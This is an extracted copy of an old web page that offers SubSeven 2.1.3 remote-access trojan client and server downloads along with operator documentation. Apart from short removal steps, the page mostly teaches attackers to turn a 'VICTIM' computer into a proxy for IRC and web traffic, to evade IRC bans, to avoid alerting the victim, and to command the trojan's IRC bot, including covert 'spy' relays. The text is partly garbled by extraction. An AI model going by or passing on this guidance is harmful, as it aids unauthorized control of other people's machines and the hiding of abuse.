subseven 2.1.3 -
TRANSCRIPT
-
8/22/2019 SubSeven 2.1.3 -
1/6
http://home.scarlet.be/~tsb64544/trojan/dl_s7.htm
- SubSeven 2.1.3 -
Client :subseven_client.zipServer + ServerEditor :subseven_server.zip
Docs :Howto Remove the server:* Goto : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run orRunServices
* Delete Key : WinLoader = '[can be anything]'.
* Remeber WinLoader Value!* reboot the system.* Delete file : Delete the exe in Winloader Value
This trojan can also be installed otherwise, but this is the default way.
http://home.scarlet.be/~tsb64544/trojan/dl_s7.htmhttp://home.scarlet.be/~tsb64544/trojan/dl_s7.htmhttp://home.scarlet.be/~tsb64544/trojan/files/subseven_client.ziphttp://home.scarlet.be/~tsb64544/trojan/files/subseven_client.ziphttp://home.scarlet.be/~tsb64544/trojan/files/subseven_client.ziphttp://home.scarlet.be/~tsb64544/trojan/files/subseven_server.ziphttp://home.scarlet.be/~tsb64544/trojan/files/subseven_server.ziphttp://home.scarlet.be/~tsb64544/trojan/files/subseven_server.ziphttp://home.scarlet.be/~tsb64544/trojan/files/subseven_server.ziphttp://home.scarlet.be/~tsb64544/trojan/files/subseven_client.ziphttp://home.scarlet.be/~tsb64544/trojan/dl_s7.htm -
8/22/2019 SubSeven 2.1.3 -
2/6
Port Redirect
Well first of all,
-What is Port redirect?
To put it in very simple words, it allows you to use common internetservices(irc,http,ftp..)through someone's pc/ip. Just like a proxy(http,socks,ftp....).
The concept is quite simple, a port is listening on the VICTIM (e.g 6667),when a connection ismade to that port it automatically redirects to the OUTPUT PORT/IP(e.g.irc.dal.net:7000).You define the "Input port", "Output port" and "Output IP"when you enable "Port Redirect" through "Add port" in the Subseven Client.
Lets says your VICTIM is "A" and DALNET is "B". What happens is thatPort Redirect opens a port on "A", when a connection is made on thatparticular port it redirectsthe CONNECTION to "B". Therefore "B" (Dalnet) thinks its "A" thats connecting
....though itsyou that is connected.
WHY??----Port Redirect has many benefits. You could use it to EVADE KLINES/GLINES onIRC, just to be anonymous, just for the heck of it or you're paranoid?? :P
-----------Example 1:-----------If u want to use Port redirect for IRC (e.g. Dalnet)
INPUT PORT:----------You can put any port as the INPUT PORT.This port will be listening on the VICTIM, e.g u can use 6667.Using 6667 has an advantage which I will discuss a little later in this text.
OUTPUT HOST/IP:--------------This has to be the address(host or IP) of the IRC server.For Dalnet u would use irc.dal.net(216.65.117.128) or even the direct addressof any Dalnet server like stlouis.dal.net, liberty.dal.net ....and so on. Youcan either put the hostnameor the IP.
OUTPUT PORT:------------The output port depends on the service or in the case of IRC ..the servertype(dalnet,undernet,efnet etc).For Dalnet you should use 7000 as the output port. You can check this in yourIRC client.For undernet you should use 6667.Port 6667 is the Default for most IRCservers.
NOTE:
-
8/22/2019 SubSeven 2.1.3 -
3/6
-----After you have done all this, CLICK on "Refresh list" from the "PortRedirect" page in Subseven client to make sure you have ENABLED port redirectcorrectly. You should see the port(s) you just added in the "RedirectedPorts" list.
USAGE:-----In your IRC CLIENT(e.g mirc) type this/server 121.232.12.27 (where 121.232.12.27 is the IP of your VICTIM)
If u set the "INPUT PORT" other than 6667 then type this/server 24.24.24.24:6669 (where 6669 is the "INPUT PORT" u chose)
After you have done this ..you will see that it connects you to Dalnet...thatwas simple right??
DONT ASK...the DALNET ircops how UNCA HELL made good use of Port Redirect!!`;)
IN A NUTSHELL:--------------Input port: 6667Output host/IP: irc.dal.netOutput port: 7000Usage in Irc Client: /server 121.232.12.27 (replace 121.232.12.27 with theVIctim's IP)
----------Example 2:----------If you want to use "Port Redirect" for HTTP (browsing)
INPUT PORT:----------Any port u like. You can use 80(default HTTP port).BUT using port 80 has an advantage and a disadvantage. Advantage is that ucan simply put the IPof the VICTIM in you browser and it REDIRECTS you to www.antionline.comThe disadvantage is that since a lot of lamers scan for well knowsservices(on port 21,80 etc..)so this might cause a lot of problems to the victim and as a result he mightnotice something is wrong :).For those of you that are very new to all this Irecommend 80.Otherwise use 81(or whatever)
OUTPUT HOST/IP:--------------209.166.177.37(www.antionline.com)
OUTPUT PORT:------------80 should be used for most webservers.
USAGE:-----
-
8/22/2019 SubSeven 2.1.3 -
4/6
Open your browser, put the IP of your victim like this:http://24.24.24.24 or
http://24.24.24.24:81 (where 81 is the "INPUT PORT" u chose).
IN A NUTSHELL:--------------Input port: 81Output host/IP: www.antionline.com (Replace with the URL of the site toreditect)Output port: 80Usage in browser: http://0.0.0.0:81 (Replace 0.0.0.0 with the Victim's IP)
SUMMARY:~~~~~~~~
You can use PORT REDIRECT for Telnet, Ftp, Http, Nntp, IRC etc ....But it is recommended to use VICTIMS with fast connections(ISDN,cable etc..)for this andfor all those of you that read this and say ..."I knew this already"...WELL
THIS ISNT MEANT FOR U SO ....... 2+2umm 5??
IRC BOT
Introduction
Firstly one your IRC bot joins your IRC channel you have toidentify to it so that it accepts commands from you.When you set up the bot you would have set a prefix most
probably. At default it is just @ but lets say we selected hell@then all our commands would be prefixed with hell@. OK now we identifyto the bot and to do this we send hell@login password if the passwordset for bot login was firez then we would send this hell@login firezTake note of spaces or the commands will not work properly.It is strongly suggested that you send all commands to the bot in/query botnick (prvmsg mode) rather than in open chan where someonewill see your bot login password and prefix.
Commands
login password - the bot will verify acceptance of password
help - displays the help menu
newpass password - sets a new login password
join #channelname key - bot joins designated channel
cycle #chan - It will cycle the chan you told it to cycle. If you do notspecifya chan it will cycle the current chan.
-
8/22/2019 SubSeven 2.1.3 -
5/6
op #chan nickname - gives operator status to the specified nick in thespecified chan.
deop #chan nickname - removes operator status
quit quitmsg - quits and displays leaving msg
nick newnickname - changes bot nickname
raw rawcommand - allows you to enter a raw irc server command
prefix newprefix - allows you to set a new command prefix
ban #chan nickname - bans specified user
unban #chan nickname - unbans specified user
say #chan/nickname texttosay - says text in channel
info - will report the current server settings
kick #chan nick - will kick the specified user
reroute #chan/nickname #chan/nickname - this will reroute everything saidfrom first entryto the second entry.
reroute #chan/nickname #chan/nickname - will reroute both ways
rroff - cancels reroute NB if you send reroute command again it overridesfirst reroute command.
Commands for operating the bot on a remote server.
spy_login #server port - ie spy_login irc.dal.net 7000 would log bot alsoonto dalnet.
spy_nick newnickname - nickname on remote server
spy_join #chan key - remote chan to join
spy_part partreason
spy_quit - quits remote server but do not specify a reason
spy_start #chan/nickname #chan/nickname - the first parameter is on theremote server and
the second parameter ir on the local server.
spy_start #chan/nickname #chan/nickname - the first parameter is on theremote server andthe second parameter ir on the local server. This links the chans and sendstext both ways.Note not only can you see what is said on a distand server but they can seewhat you say on thelocal server. Do not use this if you wish to exercise stealth.
-
8/22/2019 SubSeven 2.1.3 -
6/6
spy_stop - stops spy mode